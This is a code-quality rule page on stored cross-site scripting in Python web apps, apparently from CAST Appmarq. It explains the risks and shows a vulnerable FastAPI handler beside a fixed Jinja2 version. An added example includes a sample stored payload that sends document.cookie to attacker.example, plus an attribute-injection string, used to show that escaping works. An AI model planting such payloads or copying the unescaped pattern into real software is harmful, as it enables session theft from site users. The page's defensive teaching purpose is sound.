CRITICAL
Rule Definition
User-controlled data enters the web application from an untrusted source and is written into the generated page without being neutralised, so that markup or script supplied by an attacker executes in the browsers of other users.
This rule covers only the stored (persistent) case: the untrusted source is a database or any other back-end datastore into which user-supplied data was previously written.
Once the malicious script is injected, the attacker can perform a variety of malicious activities. The attacker could transfer private information, such as cookies that may include session information, from the victim's machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site. Phishing attacks could be used to emulate trusted web sites and trick the victim into entering a password, allowing the attacker to compromise the victim's account on that web site. Finally, the script could exploit a vulnerability in the web browser itself possibly taking over the victim's machine, sometimes referred to as "drive-by hacking."
In many cases, the attack can be launched without the victim even being aware of it. Even with careful users, attackers frequently use a variety of methods to encode the malicious portion of the attack, such as URL encoding or Unicode, so the request looks less suspicious.
Remediation
Depending on the output context: use the framework's sanitization methods, the markupsafe module (markupsafe.escape), or the standard library's html.escape(), and use the framework's recommended way of producing JSON and HTML responses (for HTML, a Jinja2 template with the default autoescaping left enabled). Escaping has to match the context the value lands in: HTML entity escaping protects element text and quoted attribute values, but data placed inside a script block or a URL needs the encoder for that context.
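The following is an added example, not code from the CAST rule page itself. It takes rows shaped like the "select * from posts" result used in the samples below (the (id, author, body) columns and the attacker-controlled second row are constructed assumptions) and renders them three ways: the violation pattern with raw interpolation, the per-value HTML escaping that html.escape, markupsafe.escape and Jinja2 autoescaping all perform, and the separate JSON encoding needed when the same data is placed inside a script block.

```python
import html
import json

# Constructed sample rows, shaped like the "select * from posts" result in the
# samples on this page. The (id, author, body) columns and the attacker-controlled
# content in the second row are assumptions made for this example.
POSTS = [
    (1, "alice", "Hello, world & welcome"),
    (2, 'bob" onmouseover="alert(1)',
     "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"),
]


def render_posts_unsafe(rows):
    """The violation pattern: stored values are interpolated into HTML verbatim,
    so a stored <script> element or a quote-breaking attribute value is rendered
    as live markup."""
    items = "".join(
        '<li data-author="%s">%s</li>' % (author, body) for _, author, body in rows
    )
    return "<h1>Posts</h1><ul>%s</ul>" % items


def render_posts_safe(rows):
    """Escape each value for the context it lands in. html.escape (quote=True is
    the default) neutralises & < > " and ', which covers element text and quoted
    attribute values; this is the same transformation markupsafe.escape and
    Jinja2 autoescaping apply to every value written into a template."""
    items = "".join(
        '<li data-author="%s">%s</li>' % (html.escape(author), html.escape(body))
        for _, author, body in rows
    )
    return "<h1>Posts</h1><ul>%s</ul>" % items


def posts_as_script_json(rows):
    """A different context needs a different encoder: data placed inside a
    <script> block is JSON-encoded, and '<', '>' and '&' are replaced by their
    \\uXXXX escapes so a stored '</script>' cannot terminate the block. HTML
    entity escaping would be wrong here, because the browser does not decode
    entities inside script content."""
    payload = json.dumps([{"id": i, "author": a, "body": b} for i, a, b in rows])
    return payload.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def has_live_script(page):
    """Crude check used when exercising this example: does the rendered page
    still contain an unescaped <script> tag or the injected event handler?"""
    return "<script>" in page or 'onmouseover="' in page


if __name__ == "__main__":
    print(render_posts_unsafe(POSTS))   # stored payload rendered as live markup
    print(render_posts_safe(POSTS))     # payload shown as inert text
    print("<script>const posts = %s;</script>" % posts_as_script_json(POSTS))
```

The escaping in render_posts_safe is exactly what a Jinja2 template with autoescaping does for you; the protection disappears for any value passed through the |safe filter or wrapped in Markup(), so those should only be used on content that was already escaped or sanitised by an allow-list HTML sanitiser.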
Violation Code Sample
...
import mysql.connector
from fastapi import FastAPI, Response

app = FastAPI()
db = mysql.connector.connect(...)

@app.get("/movies")
def func():
    cursor = db.cursor()
    # if records can be edited by users and contain dangerous HTML fragments
    cursor.execute("select * from posts")
    records = cursor.fetchall()
    # the rows are interpolated into the HTML body verbatim, so any stored
    # markup or script is rendered as markup by the browser
    return Response(content="<h1>Posts</h1><div>%s</div>" % records, media_type="text/html")  # violation
Fixed Code Sample
...
import mysql.connector
from fastapi import FastAPI, Request
from fastapi.templating import Jinja2Templates

app = FastAPI()
templates = Jinja2Templates(directory="templates")
db = mysql.connector.connect(...)

@app.get("/movies")
def func(request: Request):
    cursor = db.cursor()
    cursor.execute("select * from posts")
    records = cursor.fetchall()
    # render through a Jinja2 template: autoescaping is enabled by default, so
    # every value is HTML-escaped at the point it is written into the page
    # (as long as posts.html does not apply |safe or Markup() to the records)
    return templates.TemplateResponse("posts.html", {"request": request, "posts": records})
Reference
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
https://cwe.mitre.org/data/definitions/79.html
Open Web Application Security Project (OWASP)
https://www.owasp.org/index.php/Top_10-2017_A7-Cross-Site_Scripting_(XSS)
CISQ rule: ASCSM-CWE-79.
Cross Site Scripting Prevention Cheat Sheet
https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
Related Technologies
Technical Criterion
CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
About CAST Appmarq
CAST Appmarq is by far the biggest repository of data about real IT systems. It's built on thousands of analyzed applications, made of 35 different technologies, by over 300 business organizations across major verticals. It provides IT Leaders with factual key analytics to let them know if their applications are on track.